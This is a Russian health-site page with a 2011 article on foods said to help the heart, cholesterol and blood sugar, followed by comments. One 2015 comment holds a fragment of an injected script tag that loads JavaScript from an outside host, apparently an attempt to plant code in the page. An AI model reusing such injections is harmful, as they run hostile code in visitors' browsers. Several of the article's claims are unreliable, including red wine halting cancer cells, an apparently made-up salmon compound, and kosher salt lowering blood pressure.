Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Это нужно съесть  >>  Это нужно съесть
 
Обратная связь
 

Это нужно съесть

Размер шрифта
08 февраля 2011 00:00
  • google_analytics: false
  • Нравится

Грамотное сбалансированное питание, как известно, – залог здоровья. Вот некоторые продукты, о которых мы иногда забываем, но которые желательно включать в свой рацион за их исключительные свойства.

Свежие травы

Свежие травы способны сделать любое блюдо не только вкусным, но и полезным для сердца. С помощью трав можно уберечь себя от болезней сердца, высокого кровяного давления, высокого уровня холестерина и диабета.

Совет: розмарин, шалфей, душица, укроп, петрушка и тимьян содержат огромное количество антиоксидантов. Добавляйте их в салаты, ешьте их свежими, украшайте ими блюда из мяса, рыбы, птицы.

Черные бобы

Нежные черные бобы полны питательных веществ, необходимых для здоровой работы сердца. Фолиевая кислота, антиоксиданты и магний стабилизируют кровяное давление, а пищевые волокна помогают справиться с «вредным» холестерином и понизить уровень сахара в крови.

Совет: консервированные черные бобы – вкусное дополнение к супам и салатам. Прежде чем добавить их в блюдо, ополосните, чтобы удалить лишнюю соль.

Красное вино

Если вам не противопоказан алкоголь, немного красного вина пойдет только на пользу вашему сердцу. Дело в том, что резерватрол (ресвератрол) и катехин – два мощнейших антиоксиданта, которые содержаться в красном вине – предотвращают появление новообразований в организме, а также останавливают развитие раковых клеток. Красное вино (в допустимых количествах) также может повысить уровень «хорошего» холестерина.

ВАЖНО! Женщинам не стоит пить больше одного бокала красного вина в день, мужчинам – больше двух. Алкоголь противопоказан людям, принимающим аспирин и другие лекарства. Слишком много алкоголя негативно сказывается на работе сердца.

Лосось

Лучшая еда для сердечного здоровья – это богатый Омега-3 жирными кислотами и диаксеоцетоном лосось. Недостаточность Омега-3 жирных кислот может вызвать сбой сердечного ритма. Элементы, входящие в состав лосося также понижают уровень триглицеридов в крови и оказывают противовоспалительное действие.

Рецепт: Запекайте лосось с травами и овощами в фольге. Не менее полезен копченый или малосоленый лосось в салатах.

Тунец

Тунец, также как и лосось, полезен для сердца, так как тоже содержит Омега-3 жирные кислоты. Однако стоит эта рыба на порядок дешевле красной. Мясо альбакора – белого тунца – наиболее полезно из всех видов этой рыбы. Источниками Омега-3 жирных кислот также являются макрель, сельдь, озерная форель, сардины и анчоусы.

Рецепт: Вкусно и полезно – приготовленный на решетке стейк тунца с укропом и лимоном.

Оливковое масло холодного отжима

Эта масло, полученное после первого прессования маслин, особенно богато антиоксидантами и мононепредельными жирами. Оба компонента необходимы для стабильной работы сердечной мышцы. Замените обычное масло оливковым, и уровень вашего холестерина понизится.

Совет: используйте оливковое масло для салатов. Выбирайте масло холодного отжима с пометкой Extra Virgin (масло пригодно для использования в течение шести месяцев).

Грецкие орехи

Маленькая горстка грецких орехов, съедаемая каждый день, может понизить уровень холестерина и уменьшить воспаление в сердечных сосудах. Грецкие орехи также являются источником Омега-3 жирных кислот, мононепредельных жиров и клетчатки. При этом количество потребляемых вами калорий не увеличивается.

ВАЖНО. Горсть орехов содержит всего 300 калорий. Омега-3 жирные кислоты содержит также ореховое масло, поэтому почаще заправляйте им салаты.

Миндаль

Миндаль отлично подходит к овощам, рыбе, курице, десертам. В нем много витамина Е, растительного стерина, клетчатки и ненасыщенных моножиров. Миндаль может помочь снизить уровень холестерина и уменьшить риск диабета.

Совет: ешьте миндаль вместе с кожурой, так как она содержит флавоноиды. Эти вещества усиливают антиоксидантные свойства миндаля.

Эдамаме (молодые соевые бобы)

Эти зеленые соевые бобы можно встретить в японских ресторанах. Они богаты белком сои, который понижает уровень триглицерида крови. 100 г эдамаме содержит около 9 г понижающей холестерин клетчатки.

Рецепт: Эдамаме можно найти в магазинах японских продуктов. Замороженные бобы бросьте в кипящую воду, отварите до готовности и слегка остудите – подавайте теплыми.

Тофу

Этот соевый творог благодаря своему нейтральному вкусу сочетается с огромным количеством продуктов. Он богат высококачественным растительным белком, аминокислотами, железом и кальцием. Доказано, что регулярное употребление тофу снижает уровень холестерина в крови и уменьшает риск заболеваний сердца.

Совет: соевый творог годится как для жарки, так и для варки и для запекания. Его добавляют в супы и салаты, соусы и даже десерты. Массу рецептов с тофу вы найдете в восточноазиатской кухне.

Сладкий картофель

Заменить обычный картофель сладким стоит тем, у кого высокий уровень сахара. Батат имеет очень низкий гликемический индекс, а это говорит о том, что он вполне подходит для диабетиков. Сладкий картофель также содержит балластовое вещество, которое обладает очищающими для организма свойствами, витамин С, фолиевую кислоту и калий и витамин А. Волокна и ликопин способствуют здоровью сердечно-сосудистой системы.

Совет: усилить естественный сладковатый вкус батата можно, добавив в блюдо корицы и сок лайма.

Апельсины

В апельсинах содержится мощное оружие против холестерина – волокна пектина. А калий, которым этот фрукт также может похвастаться, положительно влияет на кровяное давление. Недавнее исследование показывает, что апельсиновый фреш способствует улучшению состояние кровеносных сосудов и понижает давление.

Кстати: средний апельсин содержит всего 62 калории и 3 грамма пищевого волокна.

Швейцарский мангольд

Его еще называют листовой свеклой. Тот самый вариант, когда полезны вершки, а не корешки. Волнистые темно-зеленые листья и длинный стебель богаты калием и магнием, а также минералами, которые контролируют кровяное давление. Пищевые волокна, витамин А, антиоксиданты, лютеин и зеаксантин делают листовую свеклу еще полезнее.

Совет: мангольд подходит к мясу или рыбе. Пожарьте его на сковороде с оливковым маслом и чесноком, пока он не станет мягким, затем приправьте травами и перцем.

Морковь

Последние исследования показывают, что этот сладкий, хрустящий овощ может помочь контролировать уровень сахара в крови и уменьшить риск развития диабета. Также морковь лучше других продуктов способна бороться с холестерином, благодаря достаточно большому количеству в ней растворимых волокон.

Совет: добавляйте тертую морковь в соус для спагетти и в тесто для сдобы.

Ячмень

Попробуйте использовать этот имеющий вкус ореха злак вместо риса, добавляйте его в супы и тушите с мясом. Пищевые волокна, которые содержит ячмень, способны понизить уровень холестерина и глюкозы.

Совет: цельный ячмень является самым питательным. А если зерна размолоть, то получившаяся мука отлично подойдет как основа для теста.

Овсянка

Овес в любом виде может помочь вашему сердцу, ведь он снижает уровень «плохого» холестерина. Тарелка овсяной каши на завтрак насыщает до обеда и помогает сохранить здоровый уровень сахара в крови.

Совет: добавляйте муку из овса в тесто для блинной и выпечки.

Льняное семя

У этого солнечного семени цвета меда есть три элемента, которые крайне полезны для вашего сердца: пищевое волокно, фитохимикаты, и Омега-3 жирные кислоты. Наш организм преобразовывает их в более полезные Омега-3 простагландин и Омега-3 тромбоксан. Они препятствуют образованию атеросклеротических бляшек, разжижают кровь, предотвращают образование тромбов и поддерживают кровеносные сосуды в тонусе.

Совет: размелите льняное семя для лучшего усвоения. Добавляйте льняную муку к хлопьям, выпечке, в йогурт или в горчицу.

Обезжиренный йогурт

Обезжиренный йогурт способен помочь в борьбе с высоким кровяным давлением. Основа этого продукта – молоко. Оно очень богато кальцием и калием, у йогурта доля этих минералов вдвое больше. Чтобы получить больше кальция и меньше жира, выбирайте обезжиренные йогурты.

Совет: используйте молоко вместо воды при заваривании «быстрой» каши, при приготовлении горячего шоколада и супов из порошка.

Продукты, богатые стиролом

Хотите, чтобы молоко или даже обыкновенный тост приносили вашему здоровью не меньше пользы, чем овощи? Тогда пейте соевое молоко или апельсиновый сок – эти продукты богаты стерином и станолом, веществами, 2-3 г которых достаточно, чтобы снизить уровень вредного холестерина на 10%.

ВАЖНО. Наш ежедневный рацион в среднем содержит 50 мг этих полезных веществ. Потреблять нужно по крайней мере 2 грамма стеринов день.

Кофе

Кофе – продукт парадоксальный. С одной стороны – кофе может быть полезен для профилактики диабета 2 типа. Исследования показывают, что люди, которые выпивают по 2-3 чашки в день, сокращают риск на 25 % – даже если выбирают кофе без кофеина. Однако к этому напитку стоит относиться с большой осторожностью тем, кто уже страдает диабетом или гипертонией. Кофеин может ухудшить состояние этих людей.

Совет: выбирайте черный кофе или обезжиренный латте, чтобы минимизировать жир и калории.

Кайенский перец чили

Использование острого молотого перца в качестве приправы может помочь предотвратить рост уровня инсулина в крови. Это подтверждается недавними австралийскими исследованиями.

Совет: молотый чили – это смесь пяти специй, в то время как высушенный перец чили это единственный острый стручок. И тот и другой – отличные заменители соли в блюдах.

Кошерная соль

Соль средней зернистости без примесей, используется для кошерования мяса животных или птицы. Добавляя ее в блюда, можно контролировать свое давление. Она содержит меньше натрия, чем столовая соль благодаря своим большим кристаллам. Профессиональные повара часто предпочитают работать именно с крупно- и среднезерновой солью.

Совет: смешайтесь кошерную соль со своими любимыми травами и получится полезная смесь специй с низким содержанием натрия.

Вишня

Вишня богата антоцианином – антиоксидантом, который, как полагают специалисты, защищает кровеносные сосуды. Эти ягоды любого сорта в любом виде обеспечивают организм питательными веществами – витаминами С, РР, B1, каротином, органическими кислотами, медью, калием, магнием, железом и пектином.

Рецепт: Добавляйте вишни без косточки в хлопья, в тесто для выпечки, в зеленый салат или смешивайте с диким рисом.

Ягоды черники

Список здоровых питательных веществ в ягодах черники обширен: антоцианин дает темно-синий цвет ягодам и поддерживает здоровье вашего сердца. Ягоды черники также содержат эллаговую кислоту, бета-каротин, лютеин, витамин C, фолиевую кислоту, магний, калий и пищевые волокна.

Рецепт: Добавляйте свежие и высушенные ягоды черники к хлопьям, в тесто для блинов и в обезжиренный йогурт. Из протертых через сито свежих ягод получится вкусный десертный соус.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 21:29

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

01 июля 2015 в 00:21

Комментарий удален за нарушение Правил общения

Статьи

       
Как утолить жажду и сохранить здоровье?   Секреты приготовления овощей   Почему нужно сократить потребление сахара и как это сделать   Опасны ли генетически модифицированные продукты?  
25 июля 2011От лишнего веса спасают наскучившие продукты 24 сентября 2010Найден самый полезный рис
 
07 мая 2013Удобно готовить на антипригарных покрытиях? Наверное, но скоро вам придется менять сустав! 24 февраля 2012"СМСмаме" - новая программа для беременных и молодых мам
 

Слайдшоу

1
Продукты для долгой жизни
Суперпродукты против усталости
Продукты, которые нас лечат. Часть 3

Тесты

1
Есть ли у вас избыточный вес?
Правильно ли вы худеете?
Здорова ли ваша предстательная железа
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.